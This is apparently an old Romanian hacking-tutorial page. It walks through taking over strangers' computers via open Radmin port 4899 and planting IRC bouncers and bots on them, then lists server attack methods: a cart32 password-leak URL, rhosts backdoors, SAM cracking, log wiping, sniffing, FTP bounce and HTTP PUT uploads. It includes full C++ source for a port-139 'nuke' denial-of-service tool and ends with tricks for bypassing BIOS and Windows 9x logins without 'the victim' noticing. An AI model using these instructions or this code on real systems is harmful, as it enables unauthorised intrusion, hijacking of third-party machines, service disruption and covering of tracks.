BA DACA AVETI CEVA TUTORIALE CARE MERITA IMI DATI UN MAIL SI LE URC  !!!

 

1. Ce este un BNC ?
PsyBNC este un bouncer(IRC proxy). Un bouncer este un client de IRC care sta pe IRC atat timp cat calculatorul pe care ruleaza psyBNC-ul este online si are conxiune la internet. PsyBNC fuctioneaza asemenea unui tunel intre tine si IRC. Cand te conectezi la psyBNC-ul tau, de fapt te conectezi la calculatorul (IP-ul) pe care ruleaza psyBNC-ul. Apoi, de pe calculatorul acela te conectezi la IRC.



tu ---------> calculator (server) ---------> IRC

2. Cum fac un BNC ?
Mai intai ai nevoie de 3 lucruri:
- un IP scanner
- Radmin
- arhiva de BNC pentru Windows
Daca nu ai accese programe le poti downloada din link-urile de mai jos:


Program Marime Download
Angry IP Scanner 103 Kb Í
Radmin 2.1 1.31 Mb Í
arhiva BNC 621 Kb Í


Dupa ce ai downloadat programele de mai sus trebui sa incepi sa scanezi IP-uri vulnerabile (adica IP-uri care au portul 4899 deschis).

Mai intai trebuie sa iti setezi scanner-ul sa scaneze doar IP-uri cu portul 4899 deschis. Deschide IP Scanner apoi du-te la Options si apoi la Select Ports. Aici introdu 4899 la Ports si apoi da OK. Mai departe trebuie setat sa arate in lista de scanare doar IP-urile cu portul 4899 deschis. Du-te la Options apoi iar la Options si bifeaza Only open ports apoi apasa OK & Save.

Acum trebuie introdus un "range" care trebuie trebuie scanat. Adica de la ce IP sa inceapa sa scaneze si la ce IP sa termine.

Exemplu: 81.196.68.0 - 81.196.70.0

Recomandare: Poti scana orice clasa de IP-uri. Personal va recomand cele care incep cu 202, 203, 210, 211, 212, 213, 217, 220 si altele.

In timp ce scanezi IP-urile trebuie sa setezi arhiva de BNC. Deschide fisierul psybnc.conf cu un editor text (Notepad sau Wordpad). Editeaza linia:

PSYBNC.SYSTEM.PORT1=31337

unde in loc de 31337 pui pe ce port te vei conecta la BNC sau il poti lasa asa.

Exemple de alte porturi: 3128, 31337, 50001 si altele.

Verifica daca ai gasit IP-uri cu portul 4899 deschis. Daca da, incearca sa te conectezi la IP folosind Radmin. Deschide Radmin Viewer, apoi du-te la Connection si mai departe da Connect to. Introdu la IP adress IP-ul care are portul 4899 deschis iar la Connection Type bifeaza Telnet. Daca s-a deschis fereastea de Telnet fara sa ceara parola inseamna ca tocmai ai gasit un IP bun pe care iti poti pune fisierele BNC-ului.

Atentie:Calculatoarele cu Win 98 sau 95 nu sunt bune pentru facut BNC deoarece nu merge conexiunea Radmin - Telnet, deci nu vei putea rula psyBNC-ul.
Ar fi bine daca ai parola respectivul IP astfel incat sa nu ai decat tu acces. IP-ul se poate parola folosind urmatoarea comanda:

r_server /port:4899 /pass:parola /save

unde in loc de parola pui ce parola vrei tu.

Acum trebuie sa urci fisierele botului pe calculatorul pe care tocmai l`ai parolat. Deschizi iar Radmin Viewer, apoi du-te la Connection si mai departe da Connect to. Introdu la IP adress IP-ul care are portul 4899 deschis iar la Connection Type bifeaza File Transfer. In IP-ul gazda creeaza un director cu numele BNC de exmplu, preferabil in directorul de la Windows.

Exemplu: C:\WINNT\System32\BNC

Selecteaza fisierele care vrei sa le transferi in directorul BNC si apoi apasa Transfer. Dupa ce termina de transferat inchide conexiunea Radmin File Transfer si deschide alta conexiune de tip Telnet.
Intra in directorul BNC pe care l`ai creat folosind comenzile DOS:

cd dir - pentru a intra intr-un anume director.
cd.. - pentru a iesi din directorul curent un nivel mai sus (up one level).

Odata ajuns in directorul unde ai pus fisierele la BNC ruleaza fisierul psybnc.exe si vei primi confirmare ca BNC-ul ruleaza.

Deschide apoi mIRC si scrie acolo urmatoare comanda pentru a te conecta la BNC:

/server IP:port

unde IP este IP-ul pe care ai rulat arhiva de BNC iar port este portul pe care l-ai introdus tu atunci cand ai editat psybnc.conf (31337 in cazul in care ai lasat portul default).

Fiindca este prima oara cand te conectezi la BNC ar trebui sa iti ceara o parola. Parola pe care o introduci acum iti va fi ceruta de fiecare data cand te conectezi la BNC. Trebuie sa tii cont si cu ce ident te-ai conectat pentru prima oara la BNC pentru ca daca il vei schimba pe parcurs nu te vei mai putea conecta la BNC.

Ca se conectezi BNC-ul va trebui sa introduci niste servere.

/addserver eu.undernet.org:
/addserver us.undernet.org:
/addserver fairfax.va.us.undernet.org:
/addserver ede.nl.eu.undernet.org:

Poti adauga cate servere doresti tu.
Lista cu toate comenzile BNC-ului o poti afla tastand:

/bhelp




Tutorial Emech Bot



Ca sa faci un eMECH trebuie sa urmezi pasii de mai jos .

1) Download-eaza programele de mai jos :

a) Angry IP Scanner
b) Remote Administrator ( Radmin )
c) TitanZoneBOT

2) Odata terminata download-area deschide Angry IP Scanner si apucate de scanat IP-uri . Cum faci asta ? ... e simplu ... dupa ce ai deschis programul apasa ALT + O + P si la sectiunea de sus " Ports " scrie portul 4899 . O alta setare utila la scanner este sa arate in lista numai IP-urile cu portul 4899 deschis . Pt. a il face sa arate doar IP-urile cu portul 4899 deschis apasa CTRL + O si bifeaza " Only open ports " iar dupaia apasa " Ok & Save " .

3) Acum selecteaza clasa de IP-uri pe care sa scanezi unde scrie "IP range" introdu de la ce IP pana la ce IP vrei sa scanezi .

Exemplu:

190.0.0.0 to 194.0.0.0

4) Dupa ce ai gasit un IP cu port-ul 4899 deschis incearca sa te conectezi la el folosind Remote Administrator .

Remote Administrator are mai multe tip-uri de conectare la server :

1. Full control ( Permite controlarea absoluta a desktop-ului )

2. View only ( Poti vedea actiunile de pe desktop )

3. Telnet ( Permite executarea unor programe )

4. File transfer ( Schimb fisiere intre server/client )

5. Shutdown ( Permite inchidere/resetarea server-ului )

Mai intai incearca sa te conectezi la IP folosind conexiunea " telnet " . Daca se deschide o fereastra de tip telnet fara ca inainte sa ceara vreo parola tocmai ai gasit un IP bun care poate deveni gazda pentru psyBNC-ul tau . Si daca tot nu era parolat , paroleaza-l tu , ca in viitor sa nu-l poata "controla" si altcineva . Pentru al parola scrie in fereastra telnet :

r_server /port:4899 /pass:ce_parola_vrei /save

Ar trebui ca urmatoarea data cand o sa vrei sa intri pe server sa-ti ceara parola .


5) Acum trebuie setati botii . Editeaza fisierele "Mech.set" si "WinMech.Users" folosind editorul tau text preferat , sau daca nu ai unul foloseste WordPad-ul din Windows sau NotePad-ul .

In fisierul "Mech.set" schimba nick-ul cu care bot-ul se va conecta la server, iar la "WinMech.Users" schimba "Handle" cu nick-ul tau . iar la "Mask" pune maska ta de pe net .

Exemplu de maska : *!*@TitanZone.users.undernet.org

Salveaza fisierele . Acum ... urca tot continutul bot-ului pe server-ul gasit . Faceti asta folosind conexiunea Remote Adminstrator File transfer ( explicatia o gasiti mai sus ) . Dupa ce ati terminat de urcat botul executati-l folosind Remote Adminstrator ,Telnet , intrati cu telnet in directorul unde ati copiat botul si tastati " TitaZone.bat " dupaia , inchide fereastra telnet si asteapta ca bot-ul sa intre pe server ( Undernet ) , in canalul #Titan . Il poti baga si pe alte canale cu comanda !join #canal .





alta hacereala ...



1. Sfaturi pentru cei ce folosesc mIRC-ul
2. Cum sa detii controlul asupra celor de pe IRC




Metode clasice de atac asupra oricarui server


Metode clasice de atac asupra oricarui server
Strangerea de informatii este vitala pentru a putea obtine acces pe un server. Voi da in continuare
10 metode de adunare a informatiilor despre server.com.
1)Pentru a afla IP-ul serverului tot ce trebuie sa faceti este tastati:
c:/>windows>tracert -j server.com
Acum este necesar sa vedem daca are optiunea "file and print share enabled",si daca sistemul de
operare este linux sau windows nt.
c:/>windows>nbtstat -A ipadress unde ipadress este adresa de IP gasita la pasul anterior. Comanda va lista
numele tuturor userilor din memoria cache daca serverul este prost configurat.
2)Trebuie sa aflam serviciile care ruleaza pe server:ftp,telnet,smtp,finger precum si vesiunea lor.
c:/>windows>ftp server.com
Daca are serviciu ftp va aparea ceva de genul "connected to server running WUFTPD...".Am aflat
versiunea de server ftp care ruleaza pe portul 23. Deschidem browserul de web si introducem
http://www.server.com/lalalalala.htm. Vom primi un raspuns de genul "file not found on this server.Server
running apache.."Am aflat si versiunea serverului pe care sunt stocate paginile web.
La fel procedam cu smtp pe portul 25.c:/>windows>telnet qmail.server.com 25 La fel vom primi un mesaj
asemanator.
Cunoscand toate serviciile care ruleaza pe server si versiunea acestora putem foarte usor gasi un
exploit pentru ele.
3)Scanam toate bugurile cunoscute in cgi-bin,cgi-win si scripts.
Cel mai bun program care face acest lucru este Cgifound. Spre exemplu un fraier mi-a trimis
deunazi un link catre un server vulnerabil si anume www.server.com. Vulnerabilitea consta in programul
cart32.exe care se gaseste in cgi-bin.exploitul este:
www.server.com/cgi-bin/cart32.exe/cart32clientlist
Parola poate fi orice cuvant si toate parolele userilor sunt listate. Este un bug cunoscut pentru
cart32.exe. Pentru a vedea insa versiunea de cart32 introduceti in browser:
www.server.com/cgi-bin/cart32.exe
Foarte multe informatii despre vulnerabilitatile acestui program gasiti pe:
www.packetstorm.securify.com tastand in motorul de cautare 'card32' sau 'card'.
Este relativ usor sa afli parola unui server, asta o poate face kiddie script insa este mai greu
sa nu lasi urme. Si mai greu este sa instalezi un backdoor pe server ca sa poti intra cand doresti.
4)Instalarea unui backdoor pe server se face in functie de sistemul de operare.
Pentru Unix:
Toti userii care au acces la serer sunt pastrati in fisierul etc/rhosts. Dupa ce am patruns inauntru
editam fisierul etc/rhosts in felul urmator: #ed etc/rhosts?somesite.com someuser*w*q Sau mai simplu
daca nu cunoasteti Unix este sa descarcati fisierul etc/rhosts si sa adaugati linia:somesite.com semeuser
Asta inseamna ca orice utilizator de pe site-ul somesite.com se poate conecta folosind
comanda 'rlogin' si userul 'someuser'. Frumos,nu?
Pentru NT:
Trebuie adaugat un cont in fisierul *.sam folosind programul 'net'.Mai multe amanunte gasiti pe
packetstorm.securify.com tastand 'NT'. Evident acest truc este detectabil de administratorul retelei
dar temporar este bun pentru ca va ajuta sa obtineti acces la radacina. Spre exemplu sub NT luati
fisierele *.sam si decriptati-le. Sub Unix rulati un script care confera drept de root(SuID shell).
Apoi dupa ce am obtinut toate parolele si informatiile dorite trebuie sa indepartam orice urma a
'vizitei' noastre pentru ca administratorul sa nu se prinda si sa putem intra oricand. Urmele se sterg
indepartand IP-ul nostru din fisierele '*.log'. Sub Unix fisierul etc/inetd.conf contine toate serviciile
care ruleaza pe server precum si setarile acestora. Ce s-ar intampla daca modificam temporar aceste
setari? :)
5)O alta metoda cunoscuta de a obtine accesul pe un server este metoda sniffingului.
Un sniffer este un program care monitorizeaza traficul pe retea si asculta pe un anume port
indicat de utilizator. Cand cineva vrea sa se conecteze la serverul de mail pentru a-si citi mesajele
parola si userul sunt interceptate si trimise la persoana care are snifferul in functiune. Un sniffer foarte
bun este Buttsniff.
Il gasiti pe www.packetstorm.securify.com. Iata cum functioneaza:
c:/>buttsniff -l 0 fisier.dmp p fisier.foo
Sa analizam putin acesta comanda: fisier.dmp este fisierul care va contine datele capturate de
sniffer. Fisierul fisier.foo contine comenzi sau mai bine zis instructiuni.
Continutul aproximativ al unui fisier.foo:
-----------------------------*.*.*.*122.1.1.4+25----------------------------
Asta inseamna ca este monitorizat serverul 122.1.1.4 pe portul 25 iar celelalte porturi sunt
excluse. Un fisier.foo gol inseamna ca vreti sa colectti toate datele care vin/pleaca de la server.
Mai multe instructiuni gasiti in fisierul readme.txt.
6)O alta metoda de a obtine acces este metoda numita 'ftp bounch attack'
Sa explic foarte pe scurt aceasta metoda:
Un server ftp A nu permite acces anonim decat unui server ftp B considerat de incredere,
probabil din aceeasi retea. Serverul ftp B are un cont 'guest' activat. Se poate patrunde in A prin B
folosind un script cu comenzi ftp ase-manator celui de mai jos: quo "USER annonymous"quo
"PASS gogo@lala.com"quo "pasv"
...........Mai multe informatii pe astalavista.
7)Odata patrunsi intr-un server ftp trebuie sa stim adresa exacta radacinii, de obicei serverul
este instalat pe o ale virtuala. Serverul www.ipswitch.com are aceasta vulnerabilitate:
www.ipswitch.com/_vti_pvt/shtml si primim drept raspuns calea exacta si reala a serverului. Acum
devine banal:
ftp server.comuser:ftppassword:guest
dir ---sa vedem la ce avem acces,poate avem acces la cgi-bin--
cd --calea aflata inainte--(c:/inet/root...)put program.exequit
8)O alta vulnerabilitate este comanda PUT. Daca serverul este configurat prost:
c:/>windows/telnet server.com 80PUT /scripts/script_ostil.asp HTTP/1.0 --corpul scriptului
--/n/n/n
Dupa aceea il executam din browser:www.server.com/script/script_ostil.asp. Portul poate sa
nu fie 80 ci 8080 sau 8000 depinde de situatie. Trebuie intai sa vedem unde ruleaza pagini web.
9)O alta metoda,de data asta pentru profesionisti este urmarirea datagramelor
sau a pachetelor de date care "intra in server". O mare companie a fost atacata in felul acesta cu
ajutorul comenzii "SYN". Nu am timp sa dau detalii, poate intr-un alt tutorial, cititi articolele de pe
astalavista, tastati 'tcp'.
10) Un program de nuke care intrerupe conexiunea la Internet,care exemplifica conceptul
de dos attack. Ideea este ca daemonul care ruleaza pe un anumit port nu poate face fata la cereri
repetate. Programul este facut in Borland C++.
Compilati-l cu borland c++ ,cu alt compilator nu cred ca merge:nuke.cpp
-------------------------------------------
#include <conio.h>
#include <stdio.h>
#include <winsock.h>struct
{
int port; char *targetIP;
int NumOfAttact, BufSize;} parm;void Pause(void)
{
cprintf ("Apasati orice tasta pentru a renunta...");
getch();
cprintf ("\r\n");
}
int CheckWinsock()
{
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD(1, 1);
err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0) return err;
if ( LOBYTE( wsaData.wVersion ) != 1 || HIBYTE( wsaData.wVersion ) != 1 )
{ WSACleanup(); return -1;
} return 0;
}
void ParseIP(char* des, char *theIP)
{ unsigned int val; char i;
for (i = 0; i < 4; i++)
{
if (*theIP != '\0')
{ val = 0;
while (*theIP != '\0' && *theIP != '.')
{ val *= 10;
val += *theIP - '0'; theIP++;
}
des[i]= (char)val;
if (*theIP != '\0') theIP++;
}
}
}
void ParseParm(int argc, char* argv[] )
{ char * value;
for (int i=1; i<argc; i++)
{
if (argv[i][0]=='/')
{
argv[i][1]= (char)toupper(argv[i][1]);
value = &argv[i][2];
switch (argv[i][1])
{case 'P': parm.port = atoi(value);
break;
case 'T': parm.targetIP=value;
break;
case 'N': parm.NumOfAttact = atoi(value);
break;
case 'S': parm.BufSize = atoi(value);
break;
}
}
}}
int main(int _argc, char* _argv[] )
{ int i, errcode; char *tempbuf;
SOCKET theSocket;
sockaddr theAddr;
cprintf ("folosire : Nuke [/Pport] [/Ttarget] [/Nnum] [/Ssize]\r\n"
" port : portul tinta, folositi 139.\r\n"
" target: adresa iP \"a.b.c.d\".\r\n"
" num: numarul de atacuri, implicit 10.\r\n"
" size: numarul de biti in fiecare atac, implicit 1024.\r\n\n");
if (CheckWinsock())
{ cprintf ("nu merge conexiunea!\n");
Pause();
return 1;
}
theSocket= socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (theSocket==-1)
{
cprintf ("nu merge conexiunea!\r\n");
Pause();
WSACleanup();
return 2;
}
cprintf ("folosim socket-ul: %d\r\n", theSocket);
parm.port = 139;
parm.targetIP= NULL;
parm.NumOfAttact = 10;
parm.BufSize = 1024;
ParseParm(_argc, _argv);
if (parm.targetIP==NULL)
{ parm.targetIP = (char*) malloc(256);
cprintf ("Introduceti Ip-ul: "); scanf ("%s", parm.targetIP);
cprintf ("\r\n"); } theAddr.sa_family = AF_INET;
theAddr.sa_data[0]= (char)(parm.port/256);
theAddr.sa_data[1]= (char)(parm.port%6);
ParseIP(&theAddr.sa_data[2], parm.targetIP;
cprintf ("conexiune la %s pe portul: %d\r\n", parm.targetIP, parm.port);
errcode = connect (theSocket, &theAddr, sizeof(sockaddr));
if (errcode){
cprintf ("Eroare.\r\nVerificati daca portul este 'pazit' de un daemon.\r\n");
Pause();
WSACleanup();
return 1;
}
cprintf ("STATUS: Conectat!!\r\n");
tempbuf = (char*) malloc(parm.BufSize);
for (i=0; i<parm.BufSize; i++)
tempbuf[i]=0;
for (i=0; i<parm.NumOfAttact; i++)
{
errcode = send (theSocket, tempbuf, parm.BufSize, MSG_OOB);
cprintf ("Atac: %d , trimis ", i);
if (errcode==-1)
cprintf ("eroare.\r\n");
else
cprintf ("%d bytes.\r\n", errcode);
} free (tempbuf);
closesocket (theSocket);
WSACleanup();
cprintf ("gata.\r\n");
Pause();
}





Windows hacking



Gasiti aici cele mai simple metode de hackuire a windows-ului

Desigur... multi vor afirma ca metodele sunt foarte simple, insa dedic acest eseu anume acelora care nu le cunosc. Astfel unii incepatori vor dori sa le citeasca inainte de a trece la subiecte mai avansate ce tin de hacking. Se mai dedica acelora care mai au inca softuri MS pe computer si nu banuiesc de pericolul care ii paste.



Cuprins:
BIOS Passwords.
Windows Login Password.
Changing Windows Visuals.
Despre stergerea urmelor.
The Registry.


--------------------------------------------------------------------------------
1.BIOS Passwords
(Pina a trece la parola de logare in windows ar trebui sa cititi si asta)

Cele mai simple informatii pe computer cum ar fi: cit de multe si ce fel de disk drive-uri aveti, care lucreaza si care sunt demontate, care se folosesc pentru bootare....etc. se pastreaza in CMOS chip-ul de pe motherboard (schimbarile in Cmos se fac din BIOS). O micuta baterie asigura cu energie Cmos-ul, astfel daca inchideti computerul, cmos-ul pastreaza aceste informatii. O metoda obisnuita de a intra in BIOS o reprezinta apasarea tastei Del la bootare, alte metode fiind Ctrl+Esc, F2... Multe computere isi au configurat bios-ul asa incit la deschiderea lui sa fie intrebata parola pc-ului. Intr-asa caz in Dialog Box apare mesajul welcome si te intreaba parola. Nu poti sa faci disable la parola decit daca esti in Bios, iar ca sa intri in Bios iti trebuie parola. Ce facem atunci va intrebati? Ii facem disable. Acum pentru a face disable la parola exista: 1) o metoda destul de populara de a trece de parola scriind default BIOS password-ul.


Citeva parole comune sunt: Lkwpeter; j262 ; AWARD_SW; AWARD_PW; Biostar;

Multe versiuni BIOS au parola default proprie care poate fi incercata. "j262" porneste cele mai multe versiuni de "Awards Bios" si aceasta metoda merge 80 la suta. AWARD_SW si AWARD_PW merg pe aceleasi computere insa aici procentajul e cu mult mai redus. Cea mai buna cale de a afla parolele bios default este de a cauta la http://astalavista.box.sk/, care este cel mai bun search engine in ce priveste probleme cu securitatea.

2) Cea de-a 2-a metoda va merge in cazul in care nu ati putut intra pe computer folosind vreun default password al bios-ului. Vom incerca sa pornim bios-ul dar sa fie incluse "default settings"-urile. Pentru aceasta va trebui sa va rasuflecati miinecele si sa va apucati sa desfaceti un computer. Intii de toate va trebui sa gasiti pe motherboard acea baterie de lithium rotunda care seamana cu o moneda de argint, va trebui apoi sa scoateti bateria si dupa 30sec. s-o puneti la loc. La unele CMOS-uri e necesara resetarea unui jumper, iar apoi dupa 5 sec. bateria trebuie pusa la loc. Sunt diferite posibilitati aici... Dupa asta cind bootati mashina, unele versiuni Bios ar putea sa va afiseze niste erori, spunindu-se ca biosul a fost resetat sau ca a fost corupt, s-a incercat o falsificare, spargere... asta insa n-ar trebui sa fie o problema. ********************************************************************************************** AVETI GRIJA: Sa umblati la Cmos sau la jumper este cu mult mai periculos decit editarea fisierelor care alcatuiesc sistemul... Trebuie sa actionati cu o deosebita precautie cind faceti asa chestii. ********************************************************************************************** SMECHERIE: Pe multe computere exista "keystroke"-uri care ar putea arunca la pamint password programul. Incercati sa bootati pc-ul, dupa care apasati tasta ESC de 50-100 ori. E posibil sa rezulte din asta caderea password programului, iar computerul sa continuie sa booteze si deci sa va dea acces la sistema. Cu toate astea pe multe computere metoda asta nu va merge.

Exista alte solutii cu privire la Bios password problem: e vorba de un program numit KillCmos la care puteti face download de pe http://astalavista.box.sk/ sau pe http://www.koasp.com/ Exista un numar mare de password crackers pentru CMOS pe site-uri, insa sa folosesti pe acelea facute de altii nu te-ar face sa te simti ca tu hackuiesti pc-ul. Mi se par injositoare metodele de a te baga pe computere la diferite organizatii, firme... folosindu-te anume de aceste programe pentru CMOS. Exceptie ar face cazul in care este o persoana care si-a uitat parola computerului :))))))) si nu doreste sa-l desfaca caci asta i-ar distruge garantia de 12 luni... Intr-asa caz pentru propriul bine se poate de folosit de acele crackuri pentru CMOS, dar sa le folosesti in scopuri nefaste, pentru a face rau cuiva ar fi cam............

--------------------------------------------------------------------------------

2.Windows Login Password

Va veti da acum seama de ce cineva va ride in hohote atunci cind va auzi cuvintele "securitate" si "windows" intr-aceeasi propozitie.
Pentru a trece de parola Windows, reboot-ati si asteptati mesajul"Starting Windows 9X"

C:\> Cd windows

***************
Alte keys-uri utile care ar afecta procesul de bootare ar fi: F4, F5, F6, F8, Ctrl+F5, Shift+F8.
***************
Ati intrat cu "cd windows" in directoria in care se afla windows-ul si trebuie sa schimbati ceva acolo. Fisierele ce tin de parolele de logare sunt *.pwl. Trebuie fie sa le transferati in alta parte, fie sa le stergeti, fie sa le schimbati denumirea extensiei: ren *.pwl *xyz. Asta ar fi un exemplu. Cel mai bine ar fi sa nu le stergeti dar sa faceti asa ca victima sa nu banuiasca ca cineva i s-a bagat pe computer. Deci comanda "ren" de mai sus este binevenita. Cu asta am terminat. In acea directorie Windows nu mai exista acele *.pwl si e posibil sa va folositi de contul oricarui user la intrarea in Windows... Dupa ce ati intrat si de veti fi curiosi veti observa ca in C:\windows s-au format alte *.pwl fisiere cu aceleasi denumiri, ocupind toate 688 bytes. Dupa ce ati terminat si doriti sa iesiti, va trebui sa le stergeti pe acele nou formate care nu v-au impiedicat la logare sa intrati in Win. Le stergeti cu "del *.pwl", dupa care le activati din nou pe acele cu parole:
ren *.xyz *.pwl .

***************
Pentru acei care se protejeaza mai bine: exista o metoda de a dezactiva cheia F8 sau cheia de Bootare. Suntem pe cale de a ne juca cu file-urile sistema asa ca ar fi bine sa faceti Backup la fisierele sistema. Daca nu.... Ar fi bine sa aveti macar o discketa de bootare ca sa puteti mai apoi repara fisierul msdos.sys.
***************
1) Gasiti fisierul msdos.sys, care se gaseste pe C:\ Apoi trebuie sa-l faceti writeable (sa-l puteti edita de ex.) si sa-l faceti sa nu fie ascuns scriind:
C:\>attrib msdos.sys -h -w.
Dupa asta msdos.sys a devenit unul unhidden si writeable :-)
2) Deschideti fisierul msdos.sys in wordpad si veti vedea urmatoarele:
;FORMAT
[Paths]
WinDir=C:\WINDOWS
WinBootDir=C:\WINDOWS
HostWinBootDrv=C
[Options]
BootMenu=0 (default)
BootMulti=1
BootGUI=1
DoubleBuffer=1
AutoScan=1
WinVer=4.10.1998
;
;The following lines are required for compatibility with other programs.
;Do not remove them (MSDOS.SYS needs to be >1024 bytes).
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxa

Pentru a dezactiva cheile functionale in timpul bootarii, direct sub [OPTIONS] inserati urmatorul piece of code: "BootKeys=0" (fara ghilimele desigur).
Acum in loc de a insera comanda BootKeys, puteti deasemenea insera urmatoarea comanda:
"BootDelay=0"
Exista putini oameni care cunosc comanda BootDelay, astfel ca computerul va fi mai in siguranta cu aceasta comanda.
Dupa inserarea comenzii, salvati fisierul msdos.sys.
3) Deoarece msdos.sys este un system file important, ar trebui sa-i schimbati la loc atributele si sa-l faceti sa fie read only si hidden:
c:\>attrib msdos.sys +h +r

***************************
Hacking Trick:
Exista alta metoda de a va rafui cu windows password-ul.
Cind va apare in fata boot meniul (care poate fi activat cu tasta F8), alegeti Safe Mode. Puteti apasa in loc de F8 - tasta F5, cu care veti nimeri direct la Safe Mode, fara a mai fi pusi in situatia de a alege ceva din Boot Menu.
In cazul in care Boot Keys-urile de felul F8, F5 etc... sunt disabled, trebuie sa va folositi de o disketa boot. Dupa ce ati hackuit BIOS password-ul, intrati in BIOS (la cele mai multe computere se poate intra in BIOS cu DEL, F2....) si faceti ca floppy disk-ul sa fie enable (de cele mai multe ori urmatoarea este ordinea: 1. floppy; 2.cd-rom; 3.Hd;).
Asigurati-va ca va fi posibil sa boot-ati de pe disketa.... urmeaza ms-dos comenzile... treceti pe hard-disk:
A:\>C: ---- in felul acesta avind acces la informatia de pe hard-disk veti face cum am aratat mai sus cu fisierele C:\Windows\*.pwl
(And Micro$oft says Windows security is quite good…gimme a break).

***************************
Daca PC-ul are ca OS Windows95 sau Windows98 si nu face parte dintr-un LAN, atunci nici n-aveti nevoie sa va folositi de toate metodele de mai sus care tin de windows password. Pur si simplu faceti click la Cancel cind va apare in fata Windows Login Dialog Box-ul :))

--------------------------------------------------------------------------------

3.Changing Windows Visuals
Sa schimbati va trebui in fisierul logow.sys care se afla in C:\Windows.
Cum sa-l schimbati va intrebati? Simplu! Va duceti la PaintBrush si selectati acolo nu un *.bmp file cu care v-ati obisnuit, dar selectati fisierul logow.sys. Il porniti (va asigur ca se va porni din Paint)... veti observa ca este un simplu fisier te tip BM (adica Bitmap), extensia sys ducindu-va in eroare. Apoi urmeaza sa schimbati acel Blue Screen cu oricare altul doriti.
Si inca ceva: Puteti sa schimbati ecranul care apare atunci cind terminati lucrul. Acel fisier este
C:\windows\logos.sys. Se face asta ca si cu logow.sys de care am vorbit mai sus.


--------------------------------------------------------------------------------

4.Despre stergerea urmelor

INFORMATIE: Orice computer conectat la Internet are un IP adress. Daca vreti sa va conectati la acel computer, trebuie sa-i cunoasteti ip adress-ul. Insa ip-urile sunt destul de greu de tinut minte, caci sunt alcatuite din 4 grupuri de cifre, fiecare grup avind maximum 3 cifre. Ce e de facut? Pentru asta exista hostname-urile. Hostname-urile sunt denumiri simple pentru ip-uri care sunt niste "denumiri folosite de limbaj omenesc" :-)) Sa zicem ca vreti sa va duceti la hotmail.com, atunci nu va trebui sa scrieti ip-ul, dar veti scrie hotmail.com - usor de tinut minte. Cind contactati hostname-ul, browserul contacteaza DNS-ul (Domain Name Server). Aceste servere "depoziteaza" hostname-urile si ip-urile. Se mai numesc Cache DNS-uri.

URL= Universal Resource Locator - adresa paginii din world wide web
##############################
Cind scrieti URL-ul unui anumit site, ce se intimpla? Browser-ul contacteaza website-ul pe care incercati sa-l accesati si download-este toate imaginile, textele.... paginii pe care o vizitati si le "depoziteaza" (inmagazineaza) pe hard-disk - ex: disk cache-ul. Deci persoana care are acces la computerul dumneavoastra e in stare sa afle ce site-uri ati vizitat.
Sa zicem ca lucrati pentru o companie si aveti de gind sa va schimbati locul de munca, pentru asta folosind Internetul in cautarea noii slujbe. Daca seful vostru controleaza si doreste sa stie in ce mod se foloseste contul de internet al companiei, atunci el n-are de facut nimic mai mult decit sa caute pe disk cache si cu siguranta asta nu va fi deloc placut pentru d-voastra.
Cum sa stergem toate urmele de pe hard disk ? Atat Internet Explorer-ul cit si Netscape Navigaror-ul pastreaza toate adresele (URL-urile) site-urilor pe care le-ati vizitat recent in URL history. Deasemenea sunt pastrate toate imaginile, html-urile, program file-urile.... in disk cache-ul.
Pentru cei ce folosesc Internet Explorer-ul:

1. Trebuie sa stearga toate entries-urile in Internet Explorer's history ( Din fereastra IExplore - apasati pe butonul History; va aparea un frame in care vor fi toate entries-urile; right click la url-ul care va face probleme, delete; cu asta am terminat)

2. Trebuie sa curatati Disk Cache-ul. De fiecare data cind accesati un url, se download-esc toate imaginile, sunetele, html-urile. Astfel daca alta data veti accesa acelasi site, atunci nu va trebui sa se faca iarasi download la toate acele file-uri, dar se vor porni ele din Disk Cache... Ca sa nu ramina ele in Disk Cache - le stergeti. La IExplore se afla ele in C:\windows\Temporary Internet Files. Le stergeti de acolo. Deasemenea daca doriti, puteti sa puneti rezervati 0Mb pentru disk cache. In asa caz nu se va pastra nimic in /Temporary Internet Files.

3. Cookies-urile.
Ce prezinta cookies-urile? Cookies-urile inregistreaza informatia specifica despre user, astfel cind acel user se intoarce iarasi pe acea pagina, informatia (cunoscuta drept informatie oficiala, stabila) este primita de pe pagina, adica user-ul este recunoscut de dinsa. Cookies-urile se afla pe hard-disk. La IExplore in C:\windows\Cookies.
Daca computerul este destinat mai multor utilizatori, fiecare cu parola proprie, atunci cautati in
C:\Windows\Profiles\{Utilizator}\Cookies;
Cookies-urile sunt folosite pentru a depozita optiunile despre fiecare user atunci cind el brows-uieste o pagina.
Baietii de la Netscape au afirmat urmatoarele despre cookies-uri:
"Acest nou mecanism reprezinta un instrument puternic care permite folosirea noilor aplicatii scrise si facute pentru medii Web. Shopping aplications (aplicatii ce tin de cumpararea bunurilor pe Internet), pot sa depoziteze de-acum informatii despre items-urile selectate curent; Pentru servicii fara plata se poate trimite inapoi informatia de inregistrare, in felul acesta utilizatorul fiind scutit de a re-tapa user-id-ul, login-ul... la urmatoarea conectare. In multe cazuri asta se face la preferinta clientului (trimiterea cookies-urilor)."
E tot ce trebuie sa stiti despre aceste cookies-uri care pot fi extrem de periculoase in anumite cazuri...
Daca va folositi de Internet de la un computer strain (de la o Internet Cafe de exemplu) ar fi bine sa cautati toate directoriile pe nume Cookies de pe hard-disk si sa stergeti toate acele *.txt files. Cu toate ca multe din acele cookies-uri nu va apartin ar fi bine sa le stergeti pe toate, fiind in felul acesta convins ca si ale voastre sau sters.

Pentru acei care se folosesc Netscape Navigator-ul:

1. Stergeti toate entries-urile: In fereastra Communicator-ului va duceti la Tools, apoi acolo la History; Stergeti entries-urile (puteti face tinind apasat butonul "SHIFT" si sageata in sus-jos. apoi "del" si le stergeti pe toate).

2. Stergeti disk cache-ul: in C:\Program Files\Netscape\Users\default\cache -in aceasta directorie se afla deobicei toate jpg-urile, gif, html....... Le stergeti din directorie sau va duceti din browser la : Edit-> Preferences-> Advanced-> Cache; ii faceti "clear disk cache"; pe linga asta mai puteti seta disk cache-ul la 0mb tot acolo;

3. Stregeti Cookies-urile: Tot in directoria Netscape/Users trebuie sa gasiti un singur fisier: cookies.txt - intr-acest fisier se afla toata informatia corespunzatoare fiecarui site, in fisier fiind inregistrate toate siteurile la/de_la care au fost trimise cookies-uri. Il stergeti.

